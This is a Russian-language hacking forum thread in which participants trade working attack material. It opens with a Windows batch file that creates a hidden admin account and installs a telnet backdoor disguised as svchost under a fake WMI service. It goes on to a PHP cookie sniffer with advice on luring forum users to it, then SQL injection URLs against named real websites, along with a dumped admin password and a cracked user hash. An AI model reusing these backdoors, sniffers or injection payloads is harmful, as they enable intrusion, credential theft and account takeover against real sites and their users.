---bat файл--- Code: @echo off net localgroup TelnetClients /add net user admin pass /add net localgroup Administratoren admin /add net localgroup TelnetClients admin /add cd %windir%\system32 ECHO Windows Registry Editor Version 5.00>0.reg ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]>>0.reg ECHO "LoginScript"=hex(2):63,00,6d,00,64,00,00,00>>0.reg ECHO "TelnetPort"=dword:000003F2>>0.reg ECHO "MaxConnections"=dword:0000000a>>0.reg ECHO "EventLoggingEnabled"=dword:00000000>>0.reg ECHO "DisconnectKillAllApps"=dword:00000000>>0.reg ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\ReadConfig]>>0.reg ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\Defaults]>>0.reg regedit /s 0.reg && DEL 0.reg COPY %windir%\system32\tlntsvr.exe %windir%\system32\"svchost.exeя" assoc .exeя=exefile sc create "WMI-Client" binpath= "%windir%\system32\svchost.exeя" start= auto "svchost.exeя" /service sc description WMI-Client "Microsoft WMI-Client" sc start WMI-Client После запуска этого батника к компу можно коннектится телнетом
Всем доброго время суток...У меня такой вопрос,знаю что не мало обсуждался,но именноо то что мне нужно я не нашел(может плохо искал,но не нашел) Мне нужен пхп-скрипт для кражи "печенюшек" с того сайта/форума которого он перешел на эту страницу...Тоесть,я например даю ссылку пользователлю форума и говорю посмотри классные девки,он переходит на ссылку (где спрятан скрипт кражи кукисов) и все его куки сохраняются в отдельный файл...у меня когда то был такой,но как грицо СПЛЫЛ...не ставьте мне "-",я только новичёк,и вроде обратился по теме,или киньте хотя бы ссылку где можна это взять...заранее благодарен Кто напишет в ПМ,буду оч сильно благодарен!
Invalid query: Can't read dir of './db17222m_231107/' (errno: 13) Кто встречал такую ошибку ? Вылетела при выборе из information_schema.tables. Версия пятая точно: )
Он на ачате валяется=,на сайте кажись=)).Ссылку ща не помню ибо давнон е пользывался.Так же в гугле их много
2maximkafun, омг, учи родной язык для начала . PHP: <?php $fp = fopen("log.log", "a"); fwrite($fp, "FROM: ".$SERVER["REMOTE_ADDR"]." DATA: ".$_SERVER["QUERY_STRING"]); fclose($fp); ?> Этот сниффер записывает все данные в файл log.log, пришедшие методом "GET". Залей его на сервер и будет тебе счастье . Но мне кажется, что это не для тебя. Попробуй сервис - s.netsec.ru. Позволяет создавать индивидуальные снифферы без напряга, респект GreenBear! Только на серве тех. работы сейчас, ГринБир говорит, что скоро все будет З.Ы. Тебя посадят.
Народ,сломал тут сайт www.zaishu.com.оказалсо БОЯНским)(.тык вот из таблицы adminrights вытащил логин и пароль админа : admin:zaishu62.В мускул доступа нет)).Но понт в том,что этот грёбаный акк никуда не подходит(даже после того,как я прошёлся по открытым портам аля фтп,8080,5100 и т.д.: ))).нашёл там папку админскую(название забыл()),пасс тож не подошёл.Помогите кто-нибудь узнать,от чего он)).
хм...чтото он ничего не пишет кроме FROM: DATA: ничего не принимает,или я чтто не так зделал...вснунул скрипт в страничку index.php, залил на хост, на форуме создал темку из неё ссылку на страницу, сам переходил и пользователи переходили,но кроме этого "FROM: DATA:" ничего не пишет,что не так?
Писал не проверяя просто. PHP: <?php $fp = fopen("log.log", "a"); fwrite($fp, "FROM: ".$_SERVER["REMOTE_ADDR"]." DATA: ".$_SERVER["QUERY_STRING"]."\r\n"); fclose($fp); ?> Так лучше. В DATA тоже ничего не будет, пока GET'ом что-нибудь не передать. Например, index.php?something. Кукисы на JS: +document.cookie добавлять к УРЛу ссылки на сниффер.
http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,version()/* 5.0.15 пробуем ... ==> http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,table_name+from+INFORMATION_SCHEMA.TABLES/* Пишет Illegal mix of collations for operation 'UNION', вроде связано с кодировкой, но пробую кодировки и ниодна не подходит(((
Элементарно Ватсон, Аес решает cmd> POST /index.php?p=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(TABLE_N AME,0x71),0x71)+from+information_schema.tables/* HTTP/1.0
А ещё, http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(column_ NAME,0x71),0x71)+from+information_schema.columns+w here+table_name=chr(39).chr(117).chr(115).chr(101) .chr(114).chr(115).chr(39)+limit+0,1/* Так это делается? char='users'
http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,user+from+users/* блин, а чё тогда не выходит???
все просто..) достаем table_schema достаем пасс: ну в итоге получил пасс и логин чела. чей id=3. т.к. 1,2 нету.) anna1;25f9e794323b453885f5181f1b624d0b расшивровуем хеш и получаем пасс: 123456789 но токо вот где вход?)